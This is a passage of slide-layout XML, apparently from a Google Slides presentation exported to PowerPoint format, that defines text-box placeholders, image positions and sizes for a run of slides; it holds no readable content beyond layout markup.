          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="4144550" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marR="0" lvl="0" algn="r"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81" name="Google Shape;1781;p126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32458" y="7061800"/>
            <a:ext cx="24443101"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82" name="Google Shape;1782;p126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32458" y="9052400"/>
            <a:ext cx="24377701" cy="1575300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="4144550" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marR="0" lvl="0" algn="r"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83" name="Google Shape;1783;p126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="10984600"/>
            <a:ext cx="24443101"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84"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1785" name="Google Shape;1785;p127"/>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27"/>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87" name="Google Shape;1787;p127"/>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88" name="Google Shape;1788;p127"/>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789" name="Google Shape;1789;p12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90" name="Google Shape;1790;p127"/>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791" name="Google Shape;1791;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92" name="Google Shape;1792;p127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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93" name="Google Shape;1793;p127"/>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127"/>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127"/>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127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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97" name="Google Shape;1797;p127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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98" name="Google Shape;1798;p127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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799" name="Google Shape;1799;p127"/>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0" name="Google Shape;1800;p127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1801" name="Google Shape;1801;p127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152516" y="10444195"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1802" name="Google Shape;1802;p127"/>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03"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1804" name="Google Shape;1804;p128"/>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28"/>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06" name="Google Shape;1806;p128"/>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07" name="Google Shape;1807;p128"/>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808" name="Google Shape;1808;p12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09" name="Google Shape;1809;p128"/>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810" name="Google Shape;1810;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11" name="Google Shape;1811;p128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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12" name="Google Shape;1812;p128"/>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28"/>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28"/>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28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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16" name="Google Shape;1816;p128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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17" name="Google Shape;1817;p128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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18" name="Google Shape;1818;p128"/>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19" name="Google Shape;1819;p128"/>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0" name="Google Shape;1820;p128"/>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1" name="Google Shape;1821;p128"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1823" name="Google Shape;1823;p129"/>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129"/>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25" name="Google Shape;1825;p129"/>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26" name="Google Shape;1826;p129"/>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827" name="Google Shape;1827;p12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28" name="Google Shape;1828;p129"/>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829" name="Google Shape;1829;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30" name="Google Shape;1830;p129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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31" name="Google Shape;1831;p129"/>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29"/>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29"/>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29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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35" name="Google Shape;1835;p129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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36" name="Google Shape;1836;p129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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37" name="Google Shape;1837;p129"/>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38" name="Google Shape;1838;p129"/>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39" name="Google Shape;1839;p129"/>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0" name="Google Shape;1840;p129"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1842" name="Google Shape;1842;p13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30"/>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44" name="Google Shape;1844;p130"/>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45" name="Google Shape;1845;p130"/>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846" name="Google Shape;1846;p13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47" name="Google Shape;1847;p130"/>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848" name="Google Shape;1848;p1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49" name="Google Shape;1849;p130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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50" name="Google Shape;1850;p13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3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13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30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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54" name="Google Shape;1854;p130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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55" name="Google Shape;1855;p130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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56" name="Google Shape;1856;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3740828"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1857" name="Google Shape;1857;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1858" name="Google Shape;1858;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8149861"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1859" name="Google Shape;1859;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1861" name="Google Shape;1861;p13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31"/>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63" name="Google Shape;1863;p131"/>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64" name="Google Shape;1864;p131"/>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865" name="Google Shape;1865;p13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66" name="Google Shape;1866;p131"/>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867" name="Google Shape;1867;p1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68" name="Google Shape;1868;p131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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69" name="Google Shape;1869;p13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3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3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31"/>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73" name="Google Shape;1873;p131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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74" name="Google Shape;1874;p131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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75" name="Google Shape;1875;p13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31"/>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77" name="Google Shape;1877;p131"/>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78" name="Google Shape;1878;p131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1879" name="Google Shape;1879;p131"/>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0" name="Google Shape;1880;p131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1881" name="Google Shape;1881;p131"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1883" name="Google Shape;1883;p132"/>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32"/>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85" name="Google Shape;1885;p132"/>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86" name="Google Shape;1886;p132"/>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887" name="Google Shape;1887;p13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88" name="Google Shape;1888;p132"/>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889" name="Google Shape;1889;p1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90" name="Google Shape;1890;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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91" name="Google Shape;1891;p132"/>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32"/>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32"/>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32"/>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95" name="Google Shape;1895;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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96" name="Google Shape;1896;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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97" name="Google Shape;1897;p132"/>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132"/>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99" name="Google Shape;1899;p132"/>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0" name="Google Shape;1900;p132"/>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1" name="Google Shape;1901;p132"/>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2" name="Google Shape;1902;p132"/>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03" name="Google Shape;1903;p132"/>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11"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Google Shape;112;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="118" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18792305" y="2427400"/>
            <a:ext cx="4875530" cy="10092796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;p36"/>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14" name="Google Shape;114;p36"/>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15" name="Google Shape;115;p36"/>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marR="0" lvl="0"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16" name="Google Shape;116;p36"/>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17" name="Google Shape;117;p3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18" name="Google Shape;118;p36"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p36"/>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20" name="Google Shape;120;p36"/>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04"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1905" name="Google Shape;1905;p133"/>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33"/>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07" name="Google Shape;1907;p133"/>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08" name="Google Shape;1908;p133"/>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909" name="Google Shape;1909;p13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10" name="Google Shape;1910;p133"/>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911" name="Google Shape;1911;p1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12" name="Google Shape;1912;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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13" name="Google Shape;1913;p133"/>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133"/>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33"/>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133"/>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17" name="Google Shape;1917;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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18" name="Google Shape;1918;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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19" name="Google Shape;1919;p133"/>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133"/>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921" name="Google Shape;1921;p133"/>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2" name="Google Shape;1922;p133"/>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23" name="Google Shape;1923;p133"/>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24" name="Google Shape;1924;p133"/>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25" name="Google Shape;1925;p133"/>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26"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1927" name="Google Shape;1927;p13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134"/>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29" name="Google Shape;1929;p134"/>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30" name="Google Shape;1930;p134"/>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931" name="Google Shape;1931;p13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32" name="Google Shape;1932;p134"/>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933" name="Google Shape;1933;p1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34" name="Google Shape;1934;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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35" name="Google Shape;1935;p13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13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13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134"/>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39" name="Google Shape;1939;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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40" name="Google Shape;1940;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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41" name="Google Shape;1941;p13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134"/>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943" name="Google Shape;1943;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3504095"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1944" name="Google Shape;1944;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1945" name="Google Shape;1945;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7203328"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1946" name="Google Shape;1946;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1947" name="Google Shape;1947;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1949" name="Google Shape;1949;p135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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135"/>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51" name="Google Shape;1951;p135"/>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52" name="Google Shape;1952;p135"/>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953" name="Google Shape;1953;p13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54" name="Google Shape;1954;p135"/>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955" name="Google Shape;1955;p1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56" name="Google Shape;1956;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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57" name="Google Shape;1957;p135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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63" name="Google Shape;1963;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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64" name="Google Shape;1964;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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65" name="Google Shape;1965;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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66" name="Google Shape;1966;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
